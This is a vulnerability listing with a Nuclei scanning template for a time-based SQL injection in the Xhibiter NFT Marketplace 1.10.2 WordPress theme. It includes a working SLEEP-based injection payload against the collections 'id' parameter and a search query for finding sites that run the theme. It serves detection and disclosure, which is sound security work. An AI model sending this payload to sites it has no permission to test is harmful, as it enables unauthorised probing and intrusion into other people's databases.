漏洞描述
The Xhibiter NFT Marketplace version 1.10.2 is vulnerable to a SQL Injection vulnerability. This allows an attacker to manipulate SQL queries by injecting malicious SQL code through vulnerable input fields.
xhibiter-nft-sqli: Xhibiter NFT Marketplace 1.10.2 - SQL Injection
PoC代码[已公开]
id: xhibiter-nft-sqli
info:
name: Xhibiter NFT Marketplace 1.10.2 - SQL Injection
author: ProjectDiscoveryAI
severity: high
description: |
The Xhibiter NFT Marketplace version 1.10.2 is vulnerable to a SQL Injection vulnerability. This allows an attacker to manipulate SQL queries by injecting malicious SQL code through vulnerable input fields.
reference:
- https://www.exploit-db.com/exploits/52060
- https://blog.securelayer7.net/sql-injection-vulnerability-in-xhibiter-nft-marketplace/
- https://x.com/ExploitDB/status/1807782485549560196
metadata:
publicwww-query: "/wp-content/themes/xhibiter/"
max-request: 2
tags: xhibiter,sqli,time-based-sqli,wordpress,wp-theme,xhibiter,nft,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '/wp-content/themes/xhibiter/'
internal: true
- raw:
- |
GET /collections?id=2'+AND+(SELECT+1492+FROM+(SELECT(SLEEP(7)))HsLV)+AND+'KEOa'='KEOa HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'duration>=7'
condition: and
# digest: 490a004630440220596cf11a1892f3b12ba32afd9168e80baeaf216bb5545d235fca6ee91f112da202202af8498dfa84005b1174b9ec54812bacec26aae20bde56ec982b92cc05d3f8b0:922c64590222798bb761d5b6d8e72950